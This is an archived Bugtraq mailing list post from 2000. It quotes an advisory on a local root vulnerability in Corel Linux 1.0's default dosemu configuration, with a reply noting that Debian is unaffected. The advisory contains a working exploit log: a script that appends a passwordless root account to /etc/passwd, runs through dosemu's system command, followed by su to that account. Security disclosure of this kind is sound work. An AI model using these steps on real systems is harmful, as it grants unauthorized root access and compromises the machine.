Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: Corel Linux 1.0 dosemu default configuration: Local root vuln
From: sarnold () WILLAMETTE EDU (Seth R Arnold)
Date: Fri, 3 Mar 2000 10:33:51 -0800


I tested this on debian's dosemu, Version: 0.98.8-2, (debian woody) and
did not get these results. It seems the debian maintainer (Herbert Xu)
Did The Right Thing in the config file.

:)

* suid () SUID KG <suid () SUID KG> [000303 10:28]:
Re all,

Hadn't seen this one around yet, has been on my site for about a week now.

Corel's mailserver bounced me about this IIRC? Whats up Corel?

Cheers.

----------------------------

suid () suid kg - Corel Linux dosemu config error. Local root compromise.

Software:     Corel Linux 1.0 dosemu distribution configuration
URL:          http://linux.corel.com
Version:      Version 1.0
Platforms:    Corel Linux only.
Type:         Default misconfiguration. Noone reads README anymore??

Summary:

      Local users can take advantage of a packaging and configuration
      error (which has been known and documented for a long time) to
      execute arbitrary commands as root.

      We see from the doc/README/SECURITY file as well as
      http://www.dosemu.org/docs/README/0.98/README-3.html
      written in 1997 that this configuration is bad.

Vulnerability:

      The system.com command is available to any user who runs the
      dos emulator. This is a direct violation of the advice from
      the SECURITY readme file:

              Never allow the 'system.com' command (part of dosemu)
              to be executed. It makes dosemu
                execute the libc 'system() function'. Though privileges
              are turned off, the process inherits the
                switched uid-setting (uid=root, euid=user), hence the
              unix process can use setreuid to gain root
                access back. ... the rest you can imagine your self.

Exploit:

      This is a script log which details how to reproduce this:

      
              Script started on Fri Feb 25 13:54:00 2000
              nebula:~$ id
              uid=1000(suid) gid=1000(suid) groups=1000(suid)
              nebula:~$ cat > hack-corel
              #!/bin/bash
              echo "owned::0:0::/:/bin/bash" >> /etc/passwd
              ^D
              nebula:~$ chmod a+rx hack-corel
              nebula:~$ export PATH="$PATH:."
              nebula:~$ dos
              CPU speed set to 430/1 MHz
              Running on CPU=586, FPU=1, rdtsc=1

                      [ snip bunch of dosemu crap ]

              "Welcome to dosemu 0.98!
              C:\> system hack-corel;
              sh: : command not found
              C:\> exitERROR: general protection at 0x3f0ff: 0
              ERROR: SIGSEGV, protected insn...exiting!

              nebula:~$ tail -1 /etc/passwd
              owned::0:0::/:/bin/bash
              nebula:~$ su owned
              nebula:/home/suid# id
              uid=0(root) gid=0(root) groups=0(root)
              nebula:/home/suid# exit
              exit
              nebula:~$ exit

              Script done on Fri Feb 25 13:55:27 2000

Note:
      This is not a vulnerability in dosemu itself. The documentation
      warns users very specifically that this will happen if the system
      is configured as such.

Greets:

      duke
      cr
      active
      

--
Seth Arnold | http://www.willamette.edu/~sarnold/
Hate spam? See http://maps.vix.com/rbl/ for help



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]